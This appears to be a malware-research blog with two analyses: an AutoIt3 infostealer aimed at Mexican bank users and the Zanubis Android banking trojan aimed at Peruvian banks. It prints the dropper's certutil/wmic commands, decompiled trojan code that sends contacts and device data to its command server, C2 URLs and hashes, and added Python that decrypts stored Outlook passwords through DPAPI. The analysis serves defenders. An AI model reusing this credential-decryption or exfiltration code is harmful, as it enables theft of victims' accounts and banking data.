Tuesday, September 6, 2022

Pekulev MX AutoIt3 Malware

Came across this family via this tweet.

This malware arrives as a single .rar file downloaded from a remote resource that is geofenced to Mexican (MX) IP addresses; the archive contains a .CMD file with the payload embedded inside it. In essence it targets Outlook passwords stored in the registry and Chrome's SQLite databases.


Once the .cmd file runs, it calls the following commands in sequence:

  • more +5 C:\Users\user\Desktop\FichaReembolso.cmd

  • certutil -decode -f ~~ "C:\Users\user\AppData\Roaming\jkjlhkj\exe\v3.3.14.5_20180315\RINDI%xxxxx%.exe

  • certutil -decode -f C:\Users\user\Desktop\FichaReembolso.cmd "C:\Users\user\AppData\Roaming\jkjlhkj\a3x\X2NI\FichaReembolso.a3x"

  • wmic process call create '"C:\Users\user\AppData\Roaming\jkjlhkj\exe\v3.3.14.5_20180315\RINDI%xxxxx%.exe

The more +5 call prints the .cmd file from its fifth line onward and serves to confirm that the file is present and readable; the two certutil -decode calls then carve the base64-encoded payloads out of the .cmd file. Those payloads are an AutoIt3 interpreter (the RINDI%xxxxx%.exe dropped under exe\v3.3.14.5_20180315, a folder name matching the AutoIt v3.3.14.5 release) and a compiled AutoIt3 script (.a3x) that the interpreter executes, launched through wmic process call create. The following structure is created:
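To recover the payloads without running the dropper, the script below (an added example, not the sample's code or the author's) carves base64 blocks out of a .cmd file the way the certutil -decode calls above do. It assumes the blobs are wrapped in -----BEGIN/END CERTIFICATE----- markers, the form certutil looks for, and falls back to runs of bare base64 lines for droppers that omit the markers; the .a3x header check is the one public AutoIt unpackers use and is not taken from the page. The embedded sample .cmd is constructed, not the real FichaReembolso.cmd, and unlike certutil, which decodes one block per call, the function returns every block it finds.

```python
"""Carve certutil-style base64 payloads out of a batch dropper (added example)."""
import base64
import binascii
import re

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"
# A "bare" base64 line: base64 alphabet plus padding, long enough not to
# match ordinary batch commands (which contain spaces anyway).
B64_LINE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
# Header of a standalone compiled AutoIt3 script as used by public unpackers
# (assumption: taken from open-source AutoIt extractors, not from the page).
A3X_HEADER = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D") + b"EA06"


def _decode(lines):
    try:
        return base64.b64decode("".join(lines), validate=True)
    except (binascii.Error, ValueError):
        return None


def carve_blocks(text: str) -> list:
    """Return every payload embedded in the dropper text, in file order."""
    blobs = []
    inside, current = False, []
    for line in text.splitlines():
        s = line.strip()
        if s == BEGIN:
            inside, current = True, []
        elif s == END and inside:
            blob = _decode(current)
            if blob is not None:
                blobs.append(blob)
            inside = False
        elif inside:
            current.append(s)
    if blobs:
        return blobs
    # Fallback for droppers without markers: runs of consecutive base64 lines.
    run = []
    for s in [l.strip() for l in text.splitlines()] + [""]:
        if B64_LINE.match(s):
            run.append(s)
        elif run:
            blob = _decode(run)
            if blob is not None:
                blobs.append(blob)
            run = []
    return blobs


def classify(blob: bytes) -> str:
    """Label a carved payload: PE image, compiled AutoIt3 script, or unknown."""
    if blob[:2] == b"MZ":
        return "pe"
    if blob.startswith(A3X_HEADER):
        return "a3x"
    return "unknown"


def carve_dropper(text: str) -> list:
    """(kind, payload) pairs, mirroring the exe and .a3x the real dropper writes."""
    return [(classify(b), b) for b in carve_blocks(text)]


# Constructed stand-in for FichaReembolso.cmd: a few batch lines followed by
# two wrapped payloads. The stubs are not real binaries, only their headers.
PE_STUB = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
A3X_STUB = A3X_HEADER + b"\x00" * 28


def _wrap(blob: bytes) -> str:
    b64 = base64.b64encode(blob).decode()
    return "\n".join([BEGIN] + [b64[i:i + 64] for i in range(0, len(b64), 64)] + [END])


SAMPLE_CMD = "\n".join([
    "@echo off",
    'more +5 "%~f0"',
    'certutil -decode -f "%~f0" "%APPDATA%\\loader\\interpreter.exe"',
    "exit /b",
    _wrap(PE_STUB),
    _wrap(A3X_STUB),
])


if __name__ == "__main__":
    for kind, blob in carve_dropper(SAMPLE_CMD):
        print(kind, len(blob), blob[:8].hex())
```

Run it against a real dropper by reading the .cmd into a string and calling carve_dropper; writing the blobs out with their detected kind gives you the interpreter and the .a3x for decompilation without ever executing the batch file.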

The folder a3x\X2NI contains the compiled AutoIt script, which once decompiled lets us continue extracting data. The decompiled AutoIt3 script contains auxiliary functions to download files and checks that all the required files are present. It needs the SQLite3 DLL (fetched from autoitscript.com, see the IOC list) to query the browser's database files, and checks the history with this query:

In these samples the list of targeted banks is entirely Mexican, as expected from the geofencing:

  • enlaceapp.santander.com.mx

  • see.sbi.com.mx/invernet2000

  • enlace.santander.com.mx

  • security.online-banking.hsbc.com.mx

  • bbvanetcash

  • scotiaweb.scotiabank.com.mx

  • empresas.bbvanet.com.mx

If any of these URLs is present in the history database, the script posts host data to the remote server (OS language, keyboard layout, ISADMIN, architecture) and uses taskkill to kill the chrome.exe process. Requests carry the user agent Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), which is the default of the WinHttp.WinHttpRequest COM object, so on its own it is a weak indicator.

It does not only target Chrome: it also tries to steal stored Outlook POP3/SMTP/IMAP credentials by reading them from the registry. Auxiliary functions decode the stored blobs and unprotect them through the Windows API (CryptUnprotectData), which only succeeds in the session of the user who stored them, which is why the script runs under that user rather than needing elevation.
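For the Outlook part, the following added Python (not the sample's code) does the equivalent of what the script does with CryptUnprotectData, so a defender can run it in a user's session and see what an infostealer would obtain. Assumptions that are not on the page: the profiles live under HKCU\Software\Microsoft\Office\<version>\Outlook\Profiles, the password values are REG_BINARY entries named "<protocol> Password" with a one-byte prefix before the DPAPI blob (the layout public password-recovery tools rely on), the decrypted value is a NUL-terminated UTF-16LE string, and the blob signature used to recognise DPAPI data. The registry walk and the decryption only work on Windows; the blob helpers run anywhere.

```python
"""Find Outlook account passwords stored in HKCU and unprotect the DPAPI blobs (added example)."""
import sys

# Every DPAPI blob starts with version 1 followed by the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in its on-disk byte order.
DPAPI_MAGIC = bytes.fromhex("01000000" "d08c9ddf0115d1118c7a00c04fc297eb")
# Assumption: Outlook 2016+/2013/2010 profile roots (not stated on the page)
OUTLOOK_VERSIONS = ("16.0", "15.0", "14.0")


def is_dpapi_blob(data: bytes) -> bool:
    return data[:len(DPAPI_MAGIC)] == DPAPI_MAGIC


def strip_outlook_prefix(value: bytes) -> bytes:
    """Outlook writes one marker byte in front of the DPAPI blob; return the bare blob."""
    if is_dpapi_blob(value):
        return value
    if is_dpapi_blob(value[1:]):
        return value[1:]
    raise ValueError("value is not a DPAPI blob, with or without the Outlook prefix")


def _walk_passwords(key, path):
    import winreg
    i = 0
    while True:  # values of this key
        try:
            name, data, kind = winreg.EnumValue(key, i)
        except OSError:
            break
        i += 1
        if kind == winreg.REG_BINARY and name.endswith(" Password"):
            yield path, name, data
    j = 0
    while True:  # recurse into subkeys (profile, account GUID, account index)
        try:
            sub = winreg.EnumKey(key, j)
        except OSError:
            break
        j += 1
        with winreg.OpenKey(key, sub) as child:
            yield from _walk_passwords(child, path + "\\" + sub)


def find_outlook_password_values():
    """Yield (key path, value name, raw bytes) for every '* Password' value under the profiles. Windows only."""
    import winreg
    for ver in OUTLOOK_VERSIONS:
        base = rf"Software\Microsoft\Office\{ver}\Outlook\Profiles"
        try:
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, base)
        except OSError:
            continue
        with key:
            yield from _walk_passwords(key, "HKCU\\" + base)


def unprotect(blob: bytes) -> bytes:
    """CryptUnprotectData through ctypes; succeeds only in the session of the user who protected the data."""
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD), ("pbData", ctypes.c_void_p)]

    buf = ctypes.create_string_buffer(blob, len(blob))
    inp = DATA_BLOB(len(blob), ctypes.addressof(buf))
    out = DATA_BLOB()
    if not ctypes.windll.crypt32.CryptUnprotectData(
            ctypes.byref(inp), None, None, None, None, 0, ctypes.byref(out)):
        raise ctypes.WinError()
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(out.pbData)


def main():
    if not sys.platform.startswith("win"):
        print("registry walk and DPAPI need Windows; the blob helpers work anywhere")
        return
    for path, name, raw in find_outlook_password_values():
        try:
            secret = unprotect(strip_outlook_prefix(raw)).decode("utf-16-le").rstrip("\x00")
            status = f"{len(secret)} characters recoverable"  # masked on purpose
        except (ValueError, OSError) as exc:
            status = f"not recovered: {exc}"
        print(f"{path}\\{name}: {status}")


if __name__ == "__main__":
    main()
```

The report deliberately prints only lengths: the point of running it is to learn which accounts an infostealer executing as this user could recover, not to display the secrets.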

The script relies on binaries already present on the system to gather the required information; it uses WMIC to identify the operating system. Additionally, it has an auxiliary function to check whether it is running on Windows 7:

Only after it has finished its tasks does it display a MessageBox saying there was an error during the execution, and then it attempts to run a VBS file. I suspect the VBS file is some sort of cleanup file or the next stage, but I was not able to get it during my analysis. (If you came across it, please let me know.)

VT Collection



  • https://documents.drive.dreamixcorporation.com

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=2&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=3&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=4&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=r3&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=6&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=7&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=8&w=Windows%2010

  • https://documents.drive.dreamixcorporation.com/do/it.php?b1

  • https://documents.drive.dreamixcorporation.com/do/it.php?f=9&w=Windows%2010

  • https://www.autoitscript.com/autoit3/pkgmgr/sqlite/sqlite3.dll


  • 1b2ed5b0f4b63e24ce9fdfb3d56645e9cd9eab5a

  • af3fa2057b618c31a46633c50150e2c70eeae2e5

  • 3d483a4726a6e959c3b636be154569f20a287834

  • 4ef8c96c5601435494d4b0f6e7068695ab20509d

  • 137a312c8ab7389afb5af0d3980ffb7c6a7dd5e1

  • ab01d12bb8378cb434b148d5187eb43914032402

  • 15f454e11784c54dd289cd97b972888147a1920d

  • bcc74050fc4618eaadee788221c173ff9825b919

  • dd442d63405275ba64c2d6ade804bbefb797b7ea

  • fc62e0658eda805bd8c91c6badb2fc3e30726250

Thursday, September 1, 2022

Zanubis LATAM Banking Trojan

Brief note: I analyzed this sample, which I found thanks to MHT's tweet https://twitter.com/malwrhunterteam/status/1564972377452298245?s=20&t=hqLnACKdbcCOPLjLrNMfyw

07/09/2022 update at the end.

This is the first time I have seen this sample, and I am not sure if there is more documentation about it (if there is, please let me know). I am going to refer to this sample as Zanubis from now on; the reasoning behind this is the decryption key being Zanubis in the sample I analyzed. At the end, IOCs, SHA256 hashes and targeted banks can be found.

At the time of this writing, the samples were not packed and still contained logging from the authors. These samples are likely still not final versions.

The trojan

This is an overlay-based banking trojan that abuses the Accessibility Service. The infection method is the standard one, and it stores the list of applications to target in shared_preferences. It is focused on LATAM banks, and this sample targets Peruvian banks.

On startup, the ServerPrimerosPasos() method is called and collects the following information:

  • List of contacts on the device

  • List of installed applications

  • Device data, which includes:

    • manufacturer

    • model

    • fingerprint

It also checks the device brand, looking specifically for Motorola, Samsung and Huawei devices, and asks to be excluded from battery optimizations so that it stays alive in the background.

This information is formatted and sent to the remote server via websockets:

    public void ServerPrimerosPasos() {
        try {
            String contactos = this.funciones.ObtenerContactos();
            String apps = this.funciones.ObtenerApps();
            String datosTelefono = this.dispositivo.ObtenerDatos();
            String cont_res = "{ " + this.funciones.ObtenerIdCliente() + ", \"contactos\" : " + contactos + ", \"apps\" : " + apps + ", \"device_info\" : " + datosTelefono + " }";
            this.socket.emit("datos_iniciales_cliente", str_encript(cont_res, this.config.KEY_STR));
        } catch (Exception e) {
            // (handler elided in the decompiler output)
        }
    }

Websocket communications

Once the sample is installed on the victim's device, it uses the hardcoded initial URL to post data to a remote server. After the first post, the following exchanges carry encrypted strings in both directions, from the trojan and from the server:

(Screenshots in the original post: initial data sent on install, response received on install, device configuration, device packages.)

The vistas package contains all the code related to Views and WebViews, including tests and customized views that request the SMS, battery and accessibility permissions. The authors have left logging statements in the sample, likely to debug their code (the message below reads "in theory the window is being created"):

Log.e("vista alerta", "en teoria se esta creando la ventana");

Information is posted to the remote server via the NotificarPost method:

    public void NotificarPost(String contenido) {
        FnApiCon apiCon = new FnApiCon(new FnApiCon.AsyncResponse() { // from class: com.personal.pdf.funciones.Funciones.1
            @Override // com.personal.pdf.funciones.FnApiCon.AsyncResponse
            public void processFinish(String output) {
                // (body elided in the decompiler output)
            }
        });
        apiCon.prepararConsulta("d=" + contenido, this.context);
        apiCon.execute(new String[0]);
    }

The class called Configuracion stores the default configuration of the sample. The most important values stored here, for our purposes, are:

  • KEY_STR: the key used to encrypt messages, as seen in the ServerPrimerosPasos() snippet above

  • URL_INICIAL: the startup URL, loaded in onCreate inside a WebView with JavaScript enabled

  • SOCKET_SERVER: remote address used to open a WebSocket. The socket handles the following commands from the server:

    • config_packages: Returns the list of installed packages on the system

    • desinstalar_app and eliminar_app: Delete the target application

    • bloquear_telefono: Locks the screen

    • notificacion: Shows a popup (vista_popup) to the user with a title and message; both are received from the socket and decrypted

    • enviar_sms: Sends an SMS

    • permiso_contacto: Requests the contacts permission

    • permiso_sms: Requests the SMS permission

    • rev_permiso_sms: Resets the SMS permission

    • unlock_package: Allows the target package to be uninstalled

Next are some code snippets related to the previous commands, followed by the socket setup, where the server host is read from preferences and the port from config.SOCKET_PUERTO (note the plain http:// scheme):

this.socket.on("notificacion", new Emitter.Listener() { // from class: com.personal.pdf.funciones.SocketCon.8
    @Override // io.socket.emitter.Emitter.Listener
    public void call(Object... args) {
        String desencriptado = SocketCon.this.str_decrypt(args[0].toString(), SocketCon.this.config.KEY_STR);
        String titulo = "";
        String mensaje = "";
        try {
            JSONObject json = new JSONObject(desencriptado);
            if (!json.isNull("titulo") && !json.getString("titulo").equals("")) {
                titulo = json.getString("titulo");
            }
            if (!json.isNull("mensaje") && !json.getString("mensaje").equals("")) {
                mensaje = json.getString("mensaje");
            }
        } catch (Exception e2) {
            // (handler elided in the decompiler output)
        }
        Intent dialogIntent = new Intent(SocketCon.this.context, vista_popup.class);
        // ...
        dialogIntent.putExtra("titulo", titulo);
        dialogIntent.putExtra("mensaje", mensaje);
        // ...
    }
});


Socket socket3 = IO.socket(String.valueOf(Uri.parse("http://" + this.preference.getServerApp() + ":" + this.config.SOCKET_PUERTO)));
this.socket = socket3;
try {
    // (listener registration elided in the decompiler output)
} catch (Exception e) {
    Socket socket4 = this.socket;
    if (socket4 != null) {
        // ...
        this.socket = null;
    }
    this.conectado = false;
}

Data Encryption

To encrypt and decrypt data, a class named Cripto holds all the methods for string encryption and decryption, keyed with KEY_STR as the str_encript/str_decrypt calls above show.


The overlays work by reading the list of packages to monitor from pref_config_package and checking it whenever an application opens, using the package name from the accessibility event's nodeInfo:


if (!this.preference.getTargetPackage().equals("")) {
    String[] targets = this.preference.getTargetPackage().split(this.config.SPLIT_PREFERENCE);
    String[] noTargets = this.preference.getNoTargetPackage().split(this.config.SPLIT_PREFERENCE);
    this.rutas = this.preference.getTargetUrl().split(this.config.SPLIT_PREFERENCE);
    for (int i = 0; i < targets.length; i++) {
        try {
            if (nodeInfo.getPackageName().toString().equals(targets[i])) {
                boolean encontro = false;
                for (String item : noTargets) {
                    if (item.equals(targets[i])) {
                        encontro = true;
                    }
                }
                if (!encontro) {
                    z = true;
                } else {
                    z = false;
                }
                if (z & (!this.rutas[i].equals(""))) {
                    mostrarActivityNavegador(this.rutas[i], targets[i]);
                }
            }
        } catch (Exception e12) {
            // (swallowed)
        }
    }
}

If the application is in the list of targets (and not in the no-target list), a WebView with the corresponding URL is overlaid on the victim's device.
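The following Python is an added triage helper, not Zanubis code: it ports the target check above into a function that can be replayed against a dumped shared_preferences configuration, and adds a lint pass for the misconfigurations the Java swallows in catch (Exception e12), such as a URL list shorter than the target list or a target with an empty URL. The value of config.SPLIT_PREFERENCE is not on the page, so "|" is assumed; the package names in the sample configuration come from the target list below, and the URLs are invented.

```python
"""Replay Zanubis' overlay target check against a shared_preferences dump (added example)."""

SPLIT_PREFERENCE = "|"  # assumption: the real config.SPLIT_PREFERENCE value is not on the page


def overlay_url_for(foreground_pkg, target_pref, notarget_pref, url_pref, sep=SPLIT_PREFERENCE):
    """Return the overlay URL the handler would open for foreground_pkg, or None.

    Mirrors the decompiled logic: targets, no-targets and URLs are parallel
    lists; a package on the no-target list or with an empty URL is skipped,
    and an index past the end of the URL list is swallowed (catch e12).
    """
    if target_pref == "":
        return None
    targets = target_pref.split(sep)
    no_targets = set(notarget_pref.split(sep))
    rutas = url_pref.split(sep)
    for i, pkg in enumerate(targets):
        if pkg != foreground_pkg:
            continue
        if pkg in no_targets:      # suppressed by the operator (no-target list)
            return None
        if i >= len(rutas):        # misaligned lists: the Java silently catches this
            return None
        return rutas[i] or None    # empty route: z & !"".equals("") is false
    return None


def lint_config(target_pref, notarget_pref, url_pref, sep=SPLIT_PREFERENCE):
    """Flag configurations the Java code would silently mishandle."""
    targets = target_pref.split(sep) if target_pref else []
    rutas = url_pref.split(sep) if url_pref else []
    no_targets = notarget_pref.split(sep) if notarget_pref else []
    issues = []
    if len(targets) != len(rutas):
        issues.append(f"{len(targets)} targets but {len(rutas)} urls: lists misaligned")
    for i, pkg in enumerate(targets):
        ruta = rutas[i] if i < len(rutas) else ""
        if ruta == "" and pkg not in no_targets:
            issues.append(f"active target {pkg} has no overlay url")
    for pkg in no_targets:
        if pkg not in targets:
            issues.append(f"no-target entry {pkg} is not a target")
    return issues


# Constructed configuration: package names from the post's target list, URLs invented
SAMPLE_TARGETS = "pe.com.interbank.mobilebanking|com.bcp.bank.bcp|com.whatsapp"
SAMPLE_NO_TARGETS = "com.whatsapp"
SAMPLE_URLS = "https://c2.example/interbank|https://c2.example/bcp|"


if __name__ == "__main__":
    for pkg in ("com.bcp.bank.bcp", "com.whatsapp", "com.google.android.gm"):
        print(pkg, "->", overlay_url_for(pkg, SAMPLE_TARGETS, SAMPLE_NO_TARGETS, SAMPLE_URLS))
    print(lint_config(SAMPLE_TARGETS, SAMPLE_NO_TARGETS, SAMPLE_URLS))
```

When you pull the three preference strings from a device or an emulator, feed them to lint_config first: the Java never reports a misaligned configuration, so a target that "does nothing" during dynamic analysis is often just an index that the catch block swallowed.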

VT Collection



  • 0198b8fa11bf9e8442defa00befa2ab224ada5ebb4a60256f2bf5fc491cca0a1

  • 33adbff1a79da4a3fde49cececac5a6b99bf217be0c6db6cdf85a46bf2087e57

  • 95242e1d105de9c33b2c9d8a9514f58327ca32d7d24af9af19ff3f0d075ea451

  • http[:]//[:]8000/socket.io/?EIO=4&transport=polling&sid=aqOxTFmMn8gXqrvMAAru

  • https[:]//justpaste[.]it/8j6de

  • http[:]//004.fullcircleteam[.]com/014/e08133e07fc400a116ed6ef01cfde577/inicio?c000=mnn

  • https[:]//001.fullcircleteam[.]com/?c000=mnn

  • https[:]//002.fullcircleteam[.]com/?c000=mnn
  • https[:]//003.fullcircleteam[.]com/?c000=mnn

Targeted banks

  • pe.com.interbank.mobilebanking

  • pe.com.scotiabank.blpm.android.client

  • pe.com.bn.app.bancodelanacion

  • com.mibanco.bancamovil

  • pe.com.banBifBanking.icBanking.androidUI

  • com.bbva.nxt_peru

  • com.bcp.innovacxion.yapeapp

  • per.bf.desa

  • com.pe.cajasullana.cajamovil

  • com.bcp.bank.bcp

  • pe.pichincha.bm

  • com.cajahuancayo.cajahuancayo.appcajahuancayo

  • pe.cajapiura.bancamovil

  • com.cmacica.prd

  • pe.interbank.bie

  • pe.com.scotiabank.businessbanking

  • com.bcp.bank.tlc

  • com.alfinbanco.appclientes

  • pe.com.bancomercio.mobilebanking

  • com.bm_gnb_pe

  • com.whatsapp

  • com.ripley.banco.peru

  • com.zoluxiones.officebanking

  • com.cmac.cajamovilaqp

  • pe.com.cajametropolitana.homebankingcml.cmlhomebanking

  • com.pe.cajacusco.movil

  • com.caja.myapplication

  • com.cajamaynas.cajamaynas

  • com.cajatacna.droid

  • com.appcajatrujillo

  • pe.com.tarjetacencosud.canales.mitarjetacencosud

  • pe.com.cajacentro

  • pe.com.prymera.digital.app

  • pe.com.compartamos.bancamovil

  • pe.confianza.bancamovil

  • id=com.credinkamovil.pe

  • pe.com.scotiabank.blpm.android.client.csf

  • com.efectivadigital.appclientes

  • pe.solera.tarjetaoh

  • com.qapaq.banking

  • com.google.android.gm

07/09/2022 update


  • 9da516e0a2d17efe8646c1e93450cb80beafabbeb362f992ce6de0a0365da142
  • d03deb4f97ee45ec9651dc5d54db8ca523dc4307521cae3f88b966fa9bc29096
  • 9b512b9809b72b11d7bca5712517d34d6b3c4009f5518af31e5094671ec737b5

New samples have appeared with modified command strings. The unlock_package command is now called desbloquear_paquete, i.e. translated into Spanish.

There are also updates to the socket code; the SMS functions have new code added:

Also, a new setting is present: 

13/09/22 update

SHA256: 8b36ba2150047191c388ec2f12a7c28cd82b7eccb9b626e8a8620faefee0c9bf
  • http://christopherwilhelm.com/2/assets/css/animate.min.css
  • http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_1.png
  • http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_2.png
  • http://christopherwilhelm.com/2/imagenes/motorola/motorola_r_3.png
  • http://christopherwilhelm.com/2/index.php?q=001?q=004&id=d042ef59b121e01e
  • http://christopherwilhelm.com/favicon.ico

There are some changes to the code, mostly additions, but what is interesting is that they are now obfuscating their APKs to slow down analysis:
